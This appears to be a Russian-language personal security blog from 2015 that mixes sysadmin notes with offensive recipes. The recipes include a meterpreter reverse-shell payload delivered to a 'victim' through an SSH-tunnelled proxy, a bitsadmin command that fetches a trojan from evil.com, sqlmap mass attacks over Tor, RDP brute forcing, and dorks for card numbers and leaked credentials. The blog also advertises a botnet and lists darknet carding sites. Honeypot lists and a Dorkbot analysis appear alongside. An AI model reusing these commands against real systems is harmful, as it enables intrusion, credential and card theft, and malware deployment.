23.12.2015

Бэкдор через макрос в exel. Exel macros [payload generate]




Depiction of Veil payloads

Veil-Evasion
Veil-Evasion is a tool used to generate payloads that bypass antivirus solutions
Veil-Pillage
Veil-Pillage is a post-exploitation framework that integrates with Veil-Evasion.

Veil-Catapult
Veil-Catapult is a payload delivery tool that integrates with Veil-Evasion.

Veil-Ordnance
Veil-Ordnance is a tool designed to quickly generate MSF stager shellcode

Veil
Veil is the superproject containing all tools in the Veil-Framework

Тестирую:
https://www.virustotal.com/ru/file/ec009192dfbb38dea3b2aafec5045ace2b20260733705eb0bb0651ed454a6375/analysis/1450904187/

Установка и генерация шеллкода:

Fireeye malware rec "clip" [NX, EX, FX] запись действий малвари

Запись действий (видео) вредоносного файла внутри виртуальной машины гипервизора MVX (Fireeye)

NX#_debug show avc config
NX#_debug avc config vnc_rec enable


Attack Validator Controller Daemon
        Name                                          : avc
        NA Heart-Beat timeout (ms)                    : 30000
        VM Ping Retry Delay (ms)                      : 5000
        VM Ping Retry Max                             : 20

17.12.2015

FreeNAS NFS for Proxmox

The problem with using FreeNAS for a Proxmox is that the default FreeNAS NFS configuration is to map root to nobody. This makes it so that you can not use chmod or chown. Proxmox needs to use both chmod and chown. Proxmox wants to be root of the NFS

To fix this you change the Maproot User and Maproot Group in the FreeNAS NFS configure to root and wheel respectively.

PS: If you incorrectly configured the NFS and have a CT that can not be deleted you can remove it by deleting its configuration file in /etc/pve/openvz/

Update: showmount -e nsfServer is helpful for figuring out if the NFS server is working.

16.12.2015

APT Targeted attacks. The dark side of the Internet . Целенаправленные атаки. Темная сторона интернета. [моя презентация]



Цели/векторы.
APT. Организация; рынок услуг.
Нашумевшие атаки.
Алгоритм и структура атаки.
Обнаружение/подавление.


Honeypots list [сборник ханипотов]

Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases ( only redis for now) - The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot

Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - - A simple and effective phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication honeyPot
Shadow Daemon - A modular Web Application Firewall / High-Interaction Honeypot for PHP, Perl & Python apps

07.12.2015

meterpreter/reverse_tcp через промежуточный сервер с помощью SSH-туннелей

Используем левый сервер в качестве прокси, к которому будет цепляться meterpreter жертвы с помощью reverse tcp.
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST KALI_ETH0_IP 
set LPORT LPORT

В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:

proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP


Затем пробрасываем себе порт, на который будет цепляться meterpreter:

ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002


Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:

msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe


Доставляем payload.exe жертве, запускаем, радуемся.

IRMA [malware scan]


IRMA is an asynchronous and customizable analysis platform for suspicious files!

maltrail [malicious traffic detection system]

Maltrail is a malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails, along with static trails compiled from various AV reports and custom user defined lists, where trail can be anything from domain name (e.g. zvpprsensinaix.com for Banjori malware), URL (e.g. http://109.162.38.120/harsh02.exefor known malicious executable) or IP address (e.g. 103.224.167.117 for known attacker). Also, it has (optional) advanced heuristic mechanisms that can help in discovery of unknown threats (e.g. new malware).
Reporting tool

Ботнет Dorkbot [eset]

На диаграмме ниже показаны различные компоненты, которые используются в последних версиях Dorkbot, нам удалось их проанализировать.


Рассмотрим типичный процесс заражения вредоносной программой через съемный USB-накопитель, который поможет лучше проиллюстрировать роль каждого модуля. Так как Dorkbot выполняет поиск подключенных к зараженной системе съемных носителей для их последующей компрометации, многие из наших обнаружений образцов этой вредоносной программы срабатывали именно на съемных носителях. При этом на них было обнаружено два типа файлов Dorkbot: исполняемый файл дроппера и .LNK-файлы с фишинговыми названиями, которые указывают на файл дроппера.

При запуске пользователем дроппера Dorkbot с USB-носителя (обнаруживается AV-продуктами ESET как Win32/Dorkbot.I), он пытается загрузить с удаленного сервера основной компонент вредоносной программы. Адрес самого сервера жестко зашит в исполняемом файле дроппера. Загруженный файл сильно упакован, а его код извлекает из себя и исполняет исполняемый файл Win32/Dorkbot.L, который представляет из себя простую обертку (wrapper), используемую для установки основного компонента. Этот основной компонент обнаруживается нами как Win32/Dorkbot.B и отвечает за работу с удаленным сервером по IRC. Обертка также специализируется на перехвате API-функции DnsQuery у основного компонента. Такой метод используется Dorkbot для усложнения обнаружения доменов настоящих C&C-серверов антивирусными аналитиками, поскольку в таком случае у запускаемого компонента отсутствуют адреса настоящих C&C-серверов злоумышленников. Когда он попытается выполнить трансляцию доменов через DnsQuery, вызов функции будет перехвачен и в качестве одного из аргументов обертка передаст API-функции адрес настоящего C&C-сервера.

После завершения установки вредоносной программы, бот будет пытаться подключиться к IRC-серверу и будет ожидать поступления определенных команд по фиксированному каналу от злоумышленников. Как правило, бот получает команды на загрузку и исполнение в системе новых вредоносных программ, которые были указаны выше.

Ботнет на основе Dorkbot активен уже давно и злоумышленники успешно используют его по сей день. Инфраструктура управляющих C&C-серверов этого ботнета является одной из тех, деятельность которой отслеживают специалисты компании ESET. Такая информация очень важна для отслеживания изменений в поведении вредоносной программы, а также для накапливания информации о ней, с целью ее использования правоохранительными органами.

Вредоносная программа Dorkbot не использует каких-либо новых методов для компрометации новых систем. Пользователи должны быть осторожны при открытии файлов на сменных носителях, а также тех файлов, которые они получают через электронную почту и социальные сети. Для проверки своей системы на заражение Dorkbot, можно воспользоваться нашим бесплатным инструментом отсюда. На сегодняшний день антивирусные продукты ESET тысячи различных модификаций файлов Dorkbot, а также файлов вредоносных программ, которые распространяются этим ботнетом.

Ниже приведены примеры URL-адресов или их составляющих, на срабатывание которых нацелен компонент похитителя паролей Dorkbot.

06.12.2015

Security blog`s list [блоги по ИБ]

Список блогов, посвящённых информационной безопасности. Знаете (ведёте) тематический блог на русском (желательно) языке, отсутствующий здесь? Сообщите, и он обязательно будет включён в данный список.

Hack[ers] Forums list

11.11.2015

[ RAT / Bot ] list 2015

"Список актуальных ботнетов и РАТов, их характеристики и описания 2015 (list botnet/RAT)"
https://fuckav.ru/showthread.php?t=26208
Smoke Bot

Smoke Bot - это модульный бот (возможны две версии - резидентная и нерезидентная).
* нерезидентная версия - после загрузки, бот выполняет все задания и самоудаляется, т.е не устанавливается в систему

Преимущества:
- наличие модулей-плагинов, которые расширяют функционал бота, при этом не влияют на размер бота
- подробная статистика по версия системы, странам и онлайну
- подробная статистика по заданиям, загрузки / запуски, ограничение на количество и т.п.
- задания для бота на загрузку EXE или DLL (LoadLibrary, regsvr32, запуск из памяти без необходимости в криптовании)
- гео-таргетинг (выборочные загрузки только для конкретных стран или блокировка для определенных стран)
- загрузка задания с удаленного URL
- индивидуальное задание для каждого бота и поиск ботов по ID, стране или префиксу селлера
- незаметная установка в системе, защита собственных файлов и записей в реестре *
- самообновление бота через админку (локально или удаленно) *
- резервные URL для отстука *
- возможность использования префиксов для селлеров (более точная статистика и разделение заданий)

03.10.2015

sqlmap [google dork] mass attack

sqlmap -g "dork" --batch --beep --dbs --random-agent

sqlmap -u "site" --dbs --batch --beep --tor --check-tor --tor-type=SOCKS5

sqlmap --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10" --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

30.09.2015

[ OSSEC + Splunk ] config/install

On Splunk:
Example install Splunk:
rpm -Uvh splunk-5.0.2-149561-linux-2.6-x86_64.rpm

Install ossec module into splunk

nano /opt/splunk/etc/system/default/inputs.conf

[udp://192.168.10.109:10002] # OSSEC server IP
disabled = false
sourcetype = ossec

OR

21.09.2015

[ один из путей получения пароля админа windows ]

Metasploit есть специальный модуль для постэксплуатации: post/windows/gather/enum_unattend

расположение файлов:
C:\Windows\Panther\unattend.xml или Autounattend.xml
C:\Windows\Panther\Unattend\unattend.xml или Autounattend.xml
C:\sysprep.inf
C:\sysprep\sysprep.xml



"У каждой крупной компании есть типовая задача: покупаются новые компью-
теры, и на них надо установить Windows и дополнительное ПО, настроить. Есть
несколько официальных подходов к автоматизации этого процесса, но их под-
робности для нас не особенно важны. Интересно лишь то, что при установке
ОС необходимо указывать различные параметры и они задаются с помощью
специального файла. Причем если задается пароль для пользователя (локаль-
ного админа), то содержится он в этом файле в плейнтексте (максимум —
в Base64). Иногда этот файл может быть оставлен в файловой системе Windows.
Таким образом, обладая лишь пользовательским доступом в ОС, мы можем
поискать этот специальный файл и узнать, нет ли в нем пароля. Воистину easy hack!"

ЗАКАЧАТЬ ФАЙЛ В WINDOWS С ПОМОЩЬЮ BITS

bitsadmin /transfer myjob /download http://evil.com/trojan.exe c:\Windows\Temp\kb123456.exe


"Представим себе типичную ситуацию: через какую-то уязвимость мы по-
лучили возможность удаленно выполнять команды на сервере с Windows.
Высоких привилегий в ОС у нас нет, и порты зафильтрованы на внешнем
файрволе. Подошел бы вариант с бэк-коннект шеллом, но ведь надо зака-
чать наш шелл в ОС. И если под *nix-системы существует куча разных воз-
можностей, то с виндой труднее. Можно, конечно, использовать FTP-кли-
ент или скрипт WSH, но эти варианты требуют многострочных действий,
что часто бывает проблемой из-за ограничений уязвимости, которая дает
RCE.
Оказывается, Windows еще со времен XP хранит в себе интересную
тулзу — bitsadmin."

16.09.2015

APT 2015 [SAMPLE] [FAMILY/UA + MORE INFO]

ADDEDTYPEFAMILYMETHODURISAMPLEPCAPUA + MORE INFO
2/8/2015APTDarkKomet8EA4AB05FA7E
D573BA5A4EFFC3FB629308will vary - encrypted keep alive or other data
SamplepcapLibrarySsheet
2/8/2015APTPlugX / Korplug / GulpixPOST/update?id=Sample
Sample2
pcapLibrarySsheet
2/7/2015APTWindataXYZ/WinData.DLL?HELO-STX-1*10.0.0.15*RemotePC*[MAC:00-55-28-11-21-23
XYZ/WinData.DLL?HELO-STX-1*1[IPAddress]*[ComputerName]*0605[MAC:[MacAddress]]$
Sample
LibrarySsheet
2/4/2015APTPingbedGET/default.htm

PHP web shell list


15.09.2015

waidps - Wireless Auditing , Intrusion Detection & Prevention System [ WIFI IDS IPS ]

puppet [start]

1. Server:
sudo apt-get install -y puppetmaster

2. Client:
sudo apt-get install -y puppet

3. Client config /etc/puppet/puppet.conf:
[agent] server = mysuperserver node_name = cert certname = nameofworkstation 

mysuperserver - domain name (DNS server/ hosts file)

4. Test on client station:
puppet agent --test

5. Accept cert request:
puppet cert sign nameofworkstation

puppet cert --list (server cert request list)

6. on client run:
puppet agent --enable
puppet agent --test

09.09.2015

oclHashcat WPA2/NTLM

1. Нам нужен .cap файл ,,пойманый хендшейк,, , но есть проблема Hashcat-guy не принимает такой вид файла ему нужен .hccap
(не вапрос идем на оф сайт хешката и конвертим из .cap >>.hccap ) Convert

2. Словари и атаки :
Тут нам нужен актуальный словарик который имеет пароли больше чем 8 символов как мы знаем wpa/wpa2 хеш пас начинается с восмизнака . Такие словари можно скачать и у нас на форуме и в паблике их много , но я бы вам советовал сделать свой личный словарик на гига 2-4 .

2.1 Полный перебор и команды:
?u?- обозначает буквы верхнего регистра = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?l? - обозначает буквы нижнего регистра = abcdefghijklmnopqrstuvwxyz
?s?- обозначает символы = !”#$%&'()*+,-./:;??@[\]^_`{|}~
?d?- обозначает цифры = 0123456789

Пример маскаи брута : ?l?l?d?d?s?s?u?u? >>>> 8 характеров mm28!@ab
на видео показан приамер брута по словарю , аналогично , выбираем метод брут-форс , прописываем в поле ?l?l?l?l?l?l?l?l? нашу маску , и ждем результата ....

cudaHashcat64.exe -m 2500 -a 3 c:\Hacking\wireless\tp-link.hccap ?l?l?l?l?l?l?l?l

или по словарю

cudaHashcat64.exe -a 0 -m 2500 -o "G:\HashcatGUI_0281\found.txt" --outfile-format=3 -n 16 -u 128 --gpu-temp-abort=90 --gpu-temp-retain=80 "G:\HashcatGUI_0281\!Cracked\1.hccap" "G:\!WordList\!!N1\passlist_16.txt"

NTLM

cudaHashcat64.exe -t 32 -m 1000 -a 3 ntlm.hash ?a?a?a?a?a?a?a -i --increment-min=7 --increment-max=7 -o=hashresults.txt pause

30.08.2015

metasploit db connect postgresql

service postgresql start

You can verify that PostgreSQL is running by checking the output of

ss -ant

and making sure that port 5432 is listening.
State Recv-Q Send-Q Local Address:Port Peer Address:Port

LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*

Initialise the Metasploit PostgreSQL Database

With PostgreSQL up and running, we next need to create and initialize the msf database.

msfdb init

Launch msfconsole in Kali

Now that the PostgreSQL service is up and running and the database is initialized, you can launch msfconsole and verify database connectivity with the db_status command as shown below.
msfconsole
msf > db_status
[*] postgresql connected to msf3
msf >

27.08.2015

metasploit other module install

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb

...and files:
  • mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  • g++ -Wall netripper.cpp -o netripper
  • cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  • cd ../Release
  • cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

26.08.2015

Multiple Vulnerabilities [from router to pc reverse shell]


Default Password Being Used (CVE-2014-4018)

In ZTE routers the username is a constant which is “admin” and the password by default is “admin”
ROM-0 Backup File Disclosure (CVE-2014-4019)

There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

http://192.168.1.1/rom-0

24.08.2015

SPF - SpeedPhish Framework [email]

SPF (SpeedPhish Framework) is a python tool designed to allow for quick recon and deployment of simple social engineering phishing exercises.

# On most Debian/Ubuntu systems the following commands will set up all requirements
apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted

git clone https://github.com/tatanus/SPF


SCADA [АСУ ТП архитектура ]

Современные инфраструктуры АСУ ТП имеют сложную архитектуру, состоящую из таких общеизвестных элементов, как серверы, ПК, сетевые коммутаторы, технологии программного обеспечения (.Net, DCOM, XML и т. д.), и более сложных компонентов: программируемых контроллеров, передатчиков, силовых приводов, аналоговых контрольных сигналов и т. д.

Нижний уровень (1)



Здесь расположены полевые устройства. Как уже упоминалось выше, они подходят для «грязной» работы: например, они могут контролировать температуру и давление в реакторе, управлять такими операциями, как открытие и закрытие клапанов, включение и выключение насосов и пр. На этом уровне часто используется множество устройств. Это могут быть низкоуровневые программируемые логические контроллеры.
Кроме того, на этом уровне могут находиться передатчики и приводы, управляемые удаленным терминальным устройством (RTU, электронное устройство под управлением микропроцессора, которое переводит физические объекты в сигналы, понятные распределенной системе управления или SCADA-системе, путем передачи телеметрических данных на ведущую систему и сообщений от ведущей диспетчерской системы к контролируемым объектам).

Этот уровень – царство низкоуровневых промышленных протоколов, таких как Modbus, Modbus TCP, HART, Wireless HART, Profibus DP или PA, Foundation Fieldbus H1. 

04.08.2015

Windows10 [private]

Дабы поотключать все шпионство десятки необходимо сделать следущее:

Перед установкой
• Не используйте экспресс настройки. Используйте ручные. Уберите все стремные галочки.
• Не используйте аккаунт микрософт. Создайте локальный.

После установки
• Пуск > Параметры > Конфиденциальность, вырубить ВСЁ!

28.07.2015

convert qcow2 vmdk

 [from qcow2 to vmdk]
qemu-img convert -f qcow2 -O vmdk whatever.qcow2 whatever.vmdk
[from qcow2 to raw]
qemu-img convert -f qcow2 kvm_source.img -O raw kvm_destination.img 

Syslog Servers for ESXi [esxcli]


1. Enable ESXi Firewall

You will need to enable the syslog rule in the ESXi firewall (only in ESXi 5.0):

$ esxcli --server esxi1 --username root network firewall ruleset set --enabled yes --ruleset-id syslog

Note: The default syslog ruleset allows UDP/TCP 514 and TCP 1514, if you choose to use a different port you will need to update firewall ruleset.

2. Configure Syslog Servers

To specify more than one syslog server, you will need to separate them using a comma. By default, the host will use UDP protocol and port 514. However, you can specify tcp or ssl as the protocol to be used as well as the port number:

$ esxcli --server esxi1 --username root system syslog config set --loghost 
10.20.182.46,tcp://10.20.182.50:514,ssl://10.20.182.52:1514

Note: You can also authenticate against vCenter Server by specifying the --vihost parameter
3. Reload Syslog Configuration

For the syslog configuration to take effect, you will need to reload the configuration:

$ esxcli --server esxi1 --username root system syslog reload

configSyslog.sh

#!/bin/bash
# William Lam
# http://blogs.vmware.com/vsphere/automation/

PASSWORD=

if [[ $# -ne 3 ]]; then
 echo -e "\nUsage: $0 [USERNAME] [HOSTLIST] [SYSLOG_SERVERS]\n"
 exit 1
fi

if [ -z ${PASSWORD} ]; then
 echo -e "You forgot to set the password in the script!\n"
 exit 1
fi

24.07.2015

google search [заметка]


allintext: card number expiration date /2017 cvv (поиск совпадений на странице по значению)

inurl:nasa.gov filetype:xlsx "address" (списки,люди,адреса)

"DISTRIBUTION STATEMENT C" inurl:navy.mil  (конфид.доки на домене)

allinurl:ftp:// verizon.net 
(«приватные» ссылки на публично опубликованные данные,(подставляем нужный домен))

"pwd=" "UID=" ext:inc (публичные конфиг файлы)

intext:DB_PASSWORD filetype:env (открытые конфиги баз данных)

filetype:reg HKEY_CURRENT_USER "Password"= 
(на серверах Windows место конфигурационных файлов отчасти занял реестр)

filetype:xls inurl:password (логичный запрос:) )

confidential filetype:pdf daterange:2457024-2457205
(список документов PDF со словом confidential, загруженных c 1 января по 1 июля 2015 года.)
(конвертер дат http://www.onlineconversion.com/julian_date.htm)

intitle:"Index of /Personal/" -names -tutorial -banking

filetype:pcf vpn OR Group
(http://thecampusgeeks.com/ пассворд декриптор)
(файл конфигурации Cisco VPN, у которого довольно нестандартное расширение PCF и узнаваемый путь: Program Files\Cisco Systems\VPNClient\Profiles)

22.07.2015

Debian/RHEL поиск и удаление пакетов [заметка]

Вывести состояние установки пакетов, содержащих в имени строку (или регулярное выражение) «foo*»: dpkg --list 'foo*'

В Red Hat/Fedora Core/CentOS Linux- подобных наберите следующую команду чтобы получить список установленных программ
# rpm -qa | less
#rpm -e foo

В Debian Linux список установленных пакетов можно увидеть так:
# dpkg --get-selections

Удалить пакет (но не его файлы настроек): dpkg --remove foo
Удалить пакет (вместе с файлами настроек): dpkg --purge foo

14.07.2015

Nmap port scan [save ip list] + crack RDP (brute) [crowbar.py + hydra]

Nmap scan network(save ip list)
For crowbar.py :
#nmap -p3389 -P0 -sS 213.11.1.0/24 | grep "scan" | grep "(" | cut -d "(" -f2 | cut -d ")" -f1 | sed 's/$/\/32/g' > iplist.txt

For hydra:
#nmap -p3389 -P0 -sS 213.11.1.0/24 | grep "scan" | grep "(" | cut -d "(" -f2 | cut -d ")" -f1  > iplist.txt

#Masscan:
#masscan 213.11.1.0/24 -p3389 |awk '{print $6}' > iplist.txt

//....
https://github.com/galkan/crowbar
# apt-get install openvpn freerdp-x11 vncviewer
#git clone https://github.com/galkan/crowbar
//....

Brute

#hydra -t 4 -L /root/users.txt -P /root/brute/little.txt -M /root/iplist.txt -o good.txt rdp
or
#./crowbar.py -v -b rdp -S /root/iplist.txt -U /root/users.txt -C /root/brute/little.txt

alt tag


13.07.2015

[Cyberthreat Maps]

«Find out where you are on the Cyberthreat map» или «Узнай, где сейчас кипит кибервойна»
Начнем с отечественного ресурса, детища лаборатории Касперского — проект Узнай, где сейчас кипит кибервойна.
Визуализация очень красочная и удобная для просмотра, поэтому залипать на «Земной шар» можно долго (не забудьте запастись чаем).

«Norse Live Attack Map»
Однажды, крупная американская компания Norse поставила кучу ханипотов и с открытыми портами и прочими плюшками и сделала ресурс Norse Live Attack Map, где показала, что весь мир «дербанит» их ханипоты (особенно Китай).
Даже крупный новостной портал Daily Mail в своей статье ссылался на ресурс Norse Live Attack Map (стоит отдать должное — в статье фигурирует и отечественный продукт лаборатории Касперского).

Norse Live Attack Map
На самом деле стоит отметить этот ресурс — выполнен качественно, красиво и реально можно почерпнуть полезную информацию для себя. Так что залипать можно очень долго.

«Top Daily DDoS Attacks Worldwide»
Ресурс Top Daily DDoS Attacks Worldwide от корпорации Google тоже не отстает в наглядности от своих конкурентов — все также залипательно, информативно. Заодно есть и галерея «красивых атак» и выборка новостей по атакам.

«Cyber Threat Map by FireEye»
И еще один ресурс от крупной компании FireEye Cyber Threat Map.
Карта сама по себе менее информативная, однако тоже красочная, да и к тому же, можно подписаться на рассылку — будете в курсе крупных атак)

«Security Tachometer by Deutsche Telekom»
Security Tachometer от крупнейшей в Европе телекоммуникационной компании Deutsche Telekom.
Немного бледновато-скучноватый вид ресурса отпугивает, но и в нем есть плюсы — несколько видов статистики. А еще они предлагают помочь ресурсу и установить сенсоры для отслеживания активности атак.

«Cyberfeed Live Botnet Map by AnubisNetworks»
Проект Cyberfeed Live Botnet Map от компании AnubisNetworks показывает нам статистику заражений, приводя рейтинг ботнетов (zeus, andromeda и прочие).

«Real-time Web Monitor by Akamai»
Ребята с компании Akamai тоже не отстают — сервис Real-time Web Monitor тому доказательство.

Кстати, у них есть и другие визуальные карты и графы

«Global Activity Maps ATLAS»
Проект ATLAS от Arbor Networks.
Очень неплохой сервис, хоть и визуально скуден. зато отчеты по атакам, сканам, ботнетам можно выгружать в разных форматах.

«Global Botnet Threat Activity Map by Trend Micro»
Global Botnet Threat Activity Map от известной компании Trend Micro.
Визуально скудно, пару графиков по ботнетам.

«Internet Malicious Activity Maps by TeamCymru»
Internet Malicious Activity Maps от Team Cymru Research.Ребята сделали мувики по дневной активности — вышло «дешево и сердито».

«F-Secure Global Maps»
Визуально-пестрые карты от компании F-Secure — Globe и VirusMap.

UPDATE v.1.0
«Fortinet Threat Map»
Еще одна неплохая карта атак от компании FortiGuard — FortiNet.
анимация чем-то напоминает игровые автоматы или инди-игры)


«ThreatCloud World Cyber Threat Map»
Новый ресурс от компании CheckPoint — World Cyber Threat Map.
По данной карте замечено, что США усиленно бьет Украину, а Россия — Турцию…

ThreatCloud Map


09.07.2015

Nmap/Hping3 [Scan tips]

[Dumb scan]

Hping3:
#hping3 192.168.1.254 -r
#hping3 192.168.1.1 -a 192.168.1.254 -p 3306 -S

//192.168.1.254 - подставной хост
//192.168.1.1 - таргет

----> id=n+1[open] , id=+1 [close]

Nmap:
#nmap -Pn -sI 192.168.1.254 192.168.1.1

// -sI - idle scan

2-3x раз, сверить результаты.

Nmap скрипты:

nmap -n -P0 -p80,443 -iL hostNP.lst --script=\
http-apache-server-status,\
http-auth-finder,\
http-backup-finder,\
http-comments-displayer,\
http-default-accounts,\
http-devframework,\
http-enum,\
http-headers,\
http-mobileversion-checker,\
http-php-version,\
http-robots.txt,\
http-svn-info,\
http-useragent-tester,
http-vhosts,\
http-webdav-scan,\
http-xssed\
-oA script_scan_np

Nmap exploits:
nmap -n -P0 -p80,443 -iL hostNP.lst --script=\
http-csrf,\
http-dombased-xss,\
http-fileupload-exploiter,\
http-shellshock,\
http-stored-xss,\
http-vuln-cve-2006-2293,\
http-vuln-cve-2009-3960,\
http-vuln-cve-2012-1823,\
http-vuln-cve-2013-0156,\
http-vuln-cve-2013-6786,\
http-vuln-cve-2013-7091,\
http-vuln-cve-2014-3704,\
http-vuln-cve-2014-8877,\
 -oA nmap_plus

08.07.2015

Eset Nod32 Smart Security Server Update

настроить бесплатный сервер обновления:

HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info меняем значение параметра PackageFeatures на 0х0000003d


http://nod32.genesis.ua/nod326/  Eset Smart Security 4, 5, 6, 7, 8 и 9
http://www.ut21.ru/v7/ резервный сервер для всех версий

Unified Networking Lab vMX/VSRX

this is how to import vMX.ova in unetlab, it's working for me :
Upload the downloaded image : vMX.ova to the UNetLab
# mv vMX.ova vmx-14.1R1.10-domestic.ova
# mkdir tmp
# cd tmp
# tar xf ../vmx-14.1R1.10-domestic.ova
# mkdir -p /opt/unetlab/addons/qemu/vmx-14.1R1.10-domestic
# mv hda.qcow2 /opt/unetlab/addons/qemu/vmx-14.1R1.10-domestic
# cd ..
# rm -rf tmp
# /opt/unetlab/wrappers/unl_wrapper -a fixpermissions
login : root
pass : root123
and this is all, enjoy !!!

IMPORTING JUNIPER VSRX IMAGES
The following procedure refers to the most recent and supported image only. Older images should work too. Remember that UNetLab image names are strongly suggested for lab portability.
Upload the downloaded image to the UNetLab master node using for example FileZilla or WinSCP. Then login as root using SSH protocol and uncompress it:
mkdir tmp
cd tmp
tar xf ../junos-vsrx-12.1X44-D10.4-domestic.ova
Then convert the disk to the qcow2 format:
/opt/qemu/bin/qemu-img convert -f vmdk -O qcow2 junos-vsrx-12.1X44-D10.4-domestic-disk1.vmdk hda.qcow2
Create the UNetLab image:
mkdir -p /opt/unetlab/addons/qemu/vsrx-12.1X44-D10.4-domestic
mv hda.qcow2 /opt/unetlab/addons/qemu/vsrx-12.1X44-D10.4-domestic
Clean and fix permissions:
cd ..
rm -rf tmp
/opt/unetlab/wrappers/unl_wrapper -a fixpermissions
Default username is admin without password.

07.07.2015

BCC. Postfix / MS Exchange + Fireeye EX

Postfix

always_bccAdd the following entry in /etc/postfix/main.cf to forward all mails in the server to fireeyebcc@fireeye.mycorp.com.

always_bcc = fireeyebcc@fireeye.mycorp.com

sender_bcc_maps and recipient_bcc_maps

..........................................
(Вариант с Postfix. BCC)

DNS server (внутренний/внешний, который используется как основной dns для Postfix):

;$TTL 86400
$ORIGIN mycorp.com.
$TTL 3D
...
fireeye         A       192.168.1.116

После чего, Postfix будет копировать мыла на ip 192.168.1.116(адрес на интерфейсе patch3,Fireeye EX, который стоит в режиме BCC, (action - DROP, в настройках))

MS Exchange

Go To Organization Configuration > Hub Transport and select the Send Connectors tab

· Right-click to create a new send connector

· On the ‘Address Space’ page of the wizard, add your BCC domain (fetest.com in this example)

· On the ‘Network Settings’ page, choose ‘Route mail through the following smart hosts’ and

define a new smart host with the IP address of the FireEye (BCC) MTA

· Follow

On the ‘Network Settings’ page, choose ‘Route mail through the following smart hosts’ and
define a new smart host with the IP address of the FireEye (BCC) MTA


Follow the defaults to complete the rest of the wizard

Go To Organization Configuration > Hub Transport and select the Transport Rules tab
· Right-click to create a new transport rule
· On the ‘Conditions’ page of the rule wizard, do not select any conditions (so that the rule
applies unconditionally). You should get a warning that the rule will be applied to every
message
· On the ‘Actions’ page of the wizard, select ‘Blind Carbon Copy…’ and enter the BCC address
· Follow the defaults to complete the wizard and create the rule


06.07.2015

Увеличение LVM диска в виртуальной машине на лету

Гипервизор сервер Supermicro с KVM и libvirt на Ubuntu.
Гости — Ubuntu с LVM2.
Задача:
Увеличить размер системного дисков без выключения/перезагрузки гостевой ОС.

Коротко это было так:
На гипервизоре:

  • virsh list
  • virsh qemu-monitor-command vm-db --hmp «info block»
  • virsh qemu-monitor-command vm-db --hmp «block_resize drive-virtio-disk0 1000G»
На госте:
  • df -h
  • parted /dev/vda
  • print
  • resizepart 2
  • 1000GB
  • resizepart 5
  • 1000GB
  • q
  • pvresize /dev/vda5
  • lvscan
  • lvextend /dev/vm-db-vg/root -l +100%FREE
  • resize2fs /dev/vm-db-vg/root
  • df -h

02.07.2015

Darknet Sites [TOR]

02.07.2015 - work

Wiki
http://zqktlwi4fecvo6ri.onion.to/wiki/Main_Page

Malina
http://malina2ihfyawiau.onion.to/index.php

Dangerous Liaisons
http://dangeru72zvedwtg.onion.to/

Amberoad
http://amberoadychffmyw.onion.to/

Carding
http://rkgbxsx3tyq7s6ti.onion.to/main.html

Rutor
http://xuytcbrwbxbxwnbu.onion.to/

Runion
http://www.lwplxqzvmgu43uff.onion.to/

...

Русский OnionLand

http://lwplxqzvmgu43uff.onion.to - Runion, Анонимный форум: Bitcoin, Tor, свободный рынок
http://doe6ypf2fcyznaq5.onion - Runion Wiki, каталог ссылок и материалы с Runion
http://bah37war75xzkpla.onion - Ящик, сервис обмена сообщениями
http://amberoadychffmyw.onion - Amberoad, форум и торговая площадка
http://vvvvvvvv766nz273.onion - НС форум, форум национал-социалистов и расистов
http://satforumtmmmniae.onion - sat-forum in the deep web, форум спутниковых пиратов
http://nsmgu2mglfj7za6s.onion - Maxima Culpa, виртуальная исповедальня

Коммерция

Внимание! Использование торговых площадок подразумевает крайнюю степень осторожности и недоверия!
https://www.reddit.com/r/darknetmarkets - clearnet (!) DarkNet Markets, обзор и новости торговых площадок в deepweb
https://dnstats.net - clearnet (!) DarkNet stats, аптайм и различная статистика рынков дипвеба
http://foggeddriztrcar2.onion - Bitcoin Fog, старейший миксер биткоинов
https://blockchainbdgpzk.onion - BlockChain.info, официальное зеркало сервиса
http://gcvqzacplu4veul4.onion - Coinkite, официальное зеркало сервиса

Безопасность, коммуникации

http://bah37war75xzkpla.onion - Ящик, сервис обмена сообщениями на русском, без регистрации и JavaScript
http://mailtoralnhyol5v.onion - Mailtor, e-mail сервис
http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail сервис
http://sigaintevyh2rzvw.onion - SIGAINT, e-mail сервис
http://s4bysmmsnraf7eut.onion - RuggedInbox, e-mail сервис
http://inocncymyac2mufx.onion - Innocence, e-mail сервис
http://torbox3uiot6wchz.onion - TorBox, e-mail сервис внутри .onion
http://ridotnp5m5lp22gw.onion - Ridot OnionMail, e-mail сервис
http://sms4tor3vcr2geip.onion - SMS4TOR, сервис самоуничтожающихся сообщений
